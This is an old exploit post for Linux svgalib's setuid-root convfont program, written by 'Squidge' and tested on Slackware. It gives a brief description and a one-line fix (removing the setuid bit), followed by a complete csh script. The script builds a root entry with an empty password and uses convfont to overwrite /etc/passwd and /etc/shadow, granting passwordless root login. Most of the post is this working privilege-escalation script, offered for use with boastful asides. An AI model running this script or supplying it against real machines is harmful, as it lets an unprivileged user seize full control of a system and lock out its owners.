Gday. This is a small exploit written in csh that uses the bug in 
convfont where it runs as uid 0. convfont loads in a file and reorders it 
to form a fontfile. It is possible to define the output of the program.

This script creates new password (and shadow if neccessary) files, giving 
the root user no password.

It has been tested on Slackware 2.0 and Slackware 3.0 setups. If there 
are any problems then:

1) Check to see if convfont is installed (part of the svgalib)
2) Check it is setuid root
3) Make sure it *is* a Linux system :)

To Fix:

It is recommended that you remove the setuid bit on convfont, and look 
closely at all the programs supplied with svgalib. The others have uid 0 
holes as well.

Further Details:

Any problems, discussions etc email me.

Squidge 

[Here follows the script]
#!/bin/csh

echo "convfont exploit - by Squidge"
echo "squidge@onyx.infonexus.com"
echo " "
echo "this will get you root by exploiting a hole in /usr/bin/convfont"

#NOTE: If this auto-detect screws up, alter the variable PW_TYPE
#      PW_TYPE = "plain" is for a normal /etc/passwd
#      PW_TYPE = "shadow" is for a shadow /etc/passwd /etc/shadow combo

setenv PATH .:/bin:/usr/bin:/sbin:/usr/sbin 
echo " "
echo "determining system type"

if ( -e /etc/shadow ) then		# aha ! is a shadow system
	echo "found a shadow password system. good job we're ueberhackers :)"
	set PW_TYPE = shadow
else
	echo "found a normal password system. make some effort, mr root !"
	set PW_TYPE = plain
endif

set loop = 0
set limit = 100

echo > /tmp/passwd root::0:0:Squidge is an Ueberhacker:/:/bin/sh

if ( $PW_TYPE == "shadow" ) then
	echo > /tmp/shadow root::9566:0:99999:14:::
endif
echo "building passwd entry. please wait."
while ( $loop < $limit )
	@ loop++
	echo >> /tmp/passwd "                              "
	echo >> /tmp/shadow "                              "
	echo -n .
end
echo " "
echo "installing fake passwds"
echo "backing up /etc/passwd to /tmp"

cp /etc/passwd /tmp/real.passwd

if ( $PW_TYPE == "shadow" ) then
	echo "unable to backup /etc/shadow tho, as it is mode 600"
endif

convfont /tmp/passwd 32 /etc/passwd > /dev/null
convfont /tmp/shadow 32 /etc/shadow > /dev/null

if ( $status != 0 ) then
	echo "\!\!\! warning. Something dodgy occured. It could be:"
	echo "    convfont isn't installed"
	echo "    convfont isn't setuid root"
	exit
endif

echo "now return to a login prompt, and type root. you don't need a password"
echo "be sensible, and remember: squidge - The Guild"
echo "                           *******************"
rm -f /tmp/passwd /tmp/shadow

                    And he feebly wiggled his curly tail.
                        Squidge -- member *the Guild
                          trmatthe@comp.brad.ac.uk